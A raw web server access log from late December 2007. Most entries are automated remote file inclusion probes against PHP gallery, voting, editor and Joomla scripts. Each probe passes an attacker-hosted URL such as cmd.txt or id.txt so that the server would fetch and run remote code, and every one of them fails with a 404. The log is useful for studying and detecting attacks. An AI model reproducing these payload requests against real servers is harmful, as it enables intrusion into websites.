207.188.72.170 - - [27/Dec/2007:04:02:35 -0800] "GET /admin.php?include_path=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:04:24 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:04:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:04:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:05:59 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:06:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:06:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:06:20 -0800] "GET /index.php?sub=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:10:57 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.222 - - [27/Dec/2007:04:11:12 -0800] "GET /logs/access_070817.log HTTP/1.0" 200 59720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:12:14 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.188.72.170 - - [27/Dec/2007:04:12:44 -0800] "GET /logs/access_071214.log/admin.php?include_path=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.188.72.170 - - [27/Dec/2007:04:12:44 -0800] "GET /logs/admin.php?include_path=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:35 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:37 -0800] "GET //skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:40 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:50 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:55 -0800] "GET //skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:04:17:58 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://tarotcoursfft.free.fr/chantal/promenonsnous/modules/cjaycontent/admin/editor2/lib/themes/default/css/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.122.72 - - [27/Dec/2007:04:18:01 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.11.122.72 - - [27/Dec/2007:04:18:01 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:23:48 -0800] "GET /logs/access_071222.log/index.php?sub=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:23:48 -0800] "GET /logs/index.php?sub=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.61.68.226 - - [27/Dec/2007:04:24:03 -0800] "GET /logs/access_071222.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
86.61.68.226 - - [27/Dec/2007:04:24:04 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
86.61.68.226 - - [27/Dec/2007:04:24:05 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
86.61.68.226 - - [27/Dec/2007:04:25:45 -0800] "GET /logs/access_071127.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.239.202.32 - - [27/Dec/2007:04:27:35 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.202.32 - - [27/Dec/2007:04:27:36 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.202.32 - - [27/Dec/2007:04:27:36 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [27/Dec/2007:04:28:19 -0800] "GET /logs/access_071222.log/upgrade_album.php?GALLERY_BASEDIR=http://shopthishouse.com/admin/backup/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [27/Dec/2007:04:28:19 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://shopthishouse.com/admin/backup/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [27/Dec/2007:04:28:20 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://shopthishouse.com/admin/backup/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.115.68 - - [27/Dec/2007:04:30:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.68 - - [27/Dec/2007:04:30:11 -0800] "GET /tmp/sess_fc46895386cca63fbe3277ba4a4883fc HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
193.239.202.32 - - [27/Dec/2007:04:30:44 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:04:35:05 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:37:56 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:37:56 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:37:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:38:11 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:38:12 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:38:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.10.195.202 - - [27/Dec/2007:04:40:47 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.10.195.202 - - [27/Dec/2007:04:40:48 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.10.195.202 - - [27/Dec/2007:04:40:48 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:43:19 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [27/Dec/2007:04:43:22 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:04:44:38 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:04:44:40 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:48:57 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:48:57 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:04:50:06 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:04:50:06 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:50:28 -0800] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:04:50:28 -0800] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:04:53:30 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:04:58:06 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sv98rosbach.de/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:04:58:13 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sv98rosbach.de/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:04:58:26 -0800] "GET /logs/access_071212.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sv98rosbach.de/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:04:59:00 -0800] "GET /logs/access_071222.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sv98rosbach.de/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:05:00:05 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:05:00:06 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:02:15 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:02:16 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:02:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:02:18 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:02:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:02:19 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:05:04:30 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:05:04:30 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:05:04:31 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [27/Dec/2007:05:05:39 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:05:06:36 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:05:06:37 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.55.0.12 - - [27/Dec/2007:05:06:55 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
69.55.0.12 - - [27/Dec/2007:05:06:56 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:08:12 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.138.191.60 - - [27/Dec/2007:05:08:13 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://armageddon0683.zoomshare.com/files/file_injek/key1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.250.148.60 - - [27/Dec/2007:05:08:17 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.111.62.80 - - [27/Dec/2007:05:10:17 -0800] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:05:10:35 -0800] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:05:13:14 -0800] "GET /becommunity/community/index.php?pageurl=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:05:13:14 -0800] "GET //becommunity/community/index.php?pageurl=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.45 - - [27/Dec/2007:05:13:47 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.176.228.30 - - [27/Dec/2007:05:16:23 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.6.26.160 - - [27/Dec/2007:05:17:41 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.234.6 - - [27/Dec/2007:05:25:30 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:29:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:29:22 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.28.19 - - [27/Dec/2007:05:30:13 -0800] "GET /minamijewelry/html/ HTTP/1.0" 200 13288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:05:33:50 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:05:35:17 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:05:35:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:05:35:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:05:38:50 -0800] "GET /index.php?so=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:05:38:50 -0800] "GET /logs/index.php?so=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:05:43:31 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:05:48:45 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:05:52:01 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:05:53:43 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:54:26 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:54:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:54:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:05:55:18 -0800] "GET /modifyform.html?code=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:05:56:21 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:05:56:21 -0800] "GET /modifyform.html?code=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
